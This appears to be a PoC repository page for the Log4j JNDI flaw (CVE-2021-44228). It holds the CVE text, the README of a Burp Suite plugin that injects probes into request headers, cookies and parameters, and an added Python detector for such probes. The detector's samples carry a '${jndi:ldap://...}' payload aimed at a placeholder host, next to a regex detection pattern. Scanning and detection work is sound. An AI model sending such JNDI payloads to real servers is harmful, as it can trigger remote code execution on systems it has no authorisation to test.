CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Associated Vulnerability
Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Burp Suite detection plugin for the Log4j vulnerability (CVE-2021-44228)
Readme
# log4j-Scan-Burpsuite
Burp Suite detection plugin for the Log4j vulnerability (CVE-2021-44228)
Includes a switch (ON/OFF), a filter (Filter), and a send function (Send)

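# Features:
Automatically replaces request headers

Automatically replaces application/json parameters in POST requests

Automatically replaces application/x-www-form-urlencoded parameters in POST requests

Automatically replaces GET request parameters

Each request sent replaces only one parameter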

# 2022.1.26
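1. Added Cookie field detection; Cookie parameters are replaced one at a time

2. Fixed a bug where the buttons displayed incorrectly

3. Updated the UI to English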
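
For defenders reviewing traffic from a scan like this, the following added example (not part of the plugin or its README) checks the same positions the feature list and changelog name, that is headers, Cookie parameters, GET parameters, urlencoded POST parameters and JSON POST parameters, for a literal `${jndi:` lookup after decoding. The request dictionaries, the `probe.example` host and all function names are constructed for illustration.

```python
import json
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)  # literal lookup prefix only

def _json_leaves(node, path=""):
    """Yield (path, value) for every scalar in a parsed JSON document."""
    if isinstance(node, (dict, list)):
        pairs = node.items() if isinstance(node, dict) else enumerate(node)
        for key, val in pairs:
            yield from _json_leaves(val, f"{path}.{key}" if path else str(key))
    else:
        yield path, str(node)

def request_fields(req):
    """Yield (location, name, decoded value) for each position the README lists."""
    headers = {k.lower(): v for k, v in req["headers"].items()}
    for name, value in headers.items():
        if name == "cookie":
            for part in value.split(";"):
                key, _, val = part.strip().partition("=")
                yield "cookie", key, unquote_plus(val)
        else:
            yield "header", name, value
    for key, val in parse_qsl(urlsplit(req["url"]).query, keep_blank_values=True):
        yield "query", key, val
    ctype, body = headers.get("content-type", ""), req.get("body", "")
    if "application/json" in ctype:
        try:
            yield from (("json", k, v) for k, v in _json_leaves(json.loads(body)))
        except ValueError:
            yield "json", "<unparsed>", body  # malformed JSON: scan it as raw text
    elif "application/x-www-form-urlencoded" in ctype:
        for key, val in parse_qsl(body, keep_blank_values=True):
            yield "form", key, val

def find_jndi_fields(req):
    """Return sorted (location, name) pairs whose value contains a JNDI lookup."""
    return sorted({(loc, n) for loc, n, v in request_fields(req) if JNDI.search(v)})

# Constructed requests (not captured traffic); probe.example is a placeholder host.
PROBE = "${jndi:ldap://probe.example/a}"
SAMPLES = {
    "cookie": {"url": "/", "headers": {"Cookie": "sid=abc; theme=" + PROBE}},
    "query": {"url": "/s?q=%24%7Bjndi%3Aldap%3A%2F%2Fprobe.example%2Fa%7D", "headers": {}},
    "json": {"url": "/api", "headers": {"Content-Type": "application/json"},
             "body": json.dumps({"user": {"name": PROBE}})},
}
```

Because the plugin replaces only one parameter per request, each of its probes should produce exactly one flagged field; a burst of otherwise identical requests whose single flagged field moves from one position to the next is the pattern to look for in logs.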

# DNSLog
https://log.xn--9tr.com/

# Plugin page screenshots

![image](https://user-images.githubusercontent.com/54879520/151101186-5eef97b9-8bc8-4bd2-94ea-69deaf2cf5cc.png)
![image](https://user-images.githubusercontent.com/54879520/146352764-86d3c09f-f6d6-4107-867a-4e7860547959.png)


# Usage
Passively checks all traffic passing through Burp Suite; requests that need checking can also be sent to the plugin manually.

# Buttons

Use the switch button to turn scanning on or off. When it is on, all traffic passing through Burp Suite is tested for the log4j vulnerability. (A bug occasionally appears here; the actual switch state is the one shown in the text.)

![image](https://user-images.githubusercontent.com/54879520/146351788-4233ddba-e2a1-46ef-9323-01ad14a6dc12.png)


Enter a domain name to filter; only requests related to the domains that need testing are tested.

![image](https://user-images.githubusercontent.com/54879520/146352060-29bfbeb1-7166-4065-a6ed-39111f4ad0cd.png)


Click the "Clear Scan List" button to clear the scan list.

![image](https://user-images.githubusercontent.com/54879520/146353005-ae21447f-a81e-419d-b75e-8b5340477b05.png)
![image](https://user-images.githubusercontent.com/54879520/146353057-7d73cc31-c4a0-4a17-beaf-5016b8c40a5e.png)

Select the request to be sent, right-click it, and send it to the log4j Scan plugin for testing.

![image](https://user-images.githubusercontent.com/54879520/146351539-4dc42228-424a-47aa-a35d-8ba4275f61a0.png)


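# Disclaimer
Do not use this project's techniques or code for illegal purposes such as creating malware, stealing software copyright or intellectual property, or improper profiteering. Doing so, or using this project to sniff data from programs whose copyright you do not own, may violate Articles 217 and 286 of the Criminal Law of the People's Republic of China, the Cybersecurity Law of the People's Republic of China, the Regulations of the People's Republic of China on the Protection of Computer Software, and other laws. The techniques mentioned in this project may be used only in lawful settings such as private study and testing; the author of this project bears no criminal or civil liability arising from any improper use of them.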
File Snapshot

[4.0K] /data/pocs/3ca2d1808c9e111077c7674a9b6176dee5c308e6
├── [3.1K] README.md
└── [4.0K] src
    └── [ 35K] BurpExtender.java

1 directory, 2 files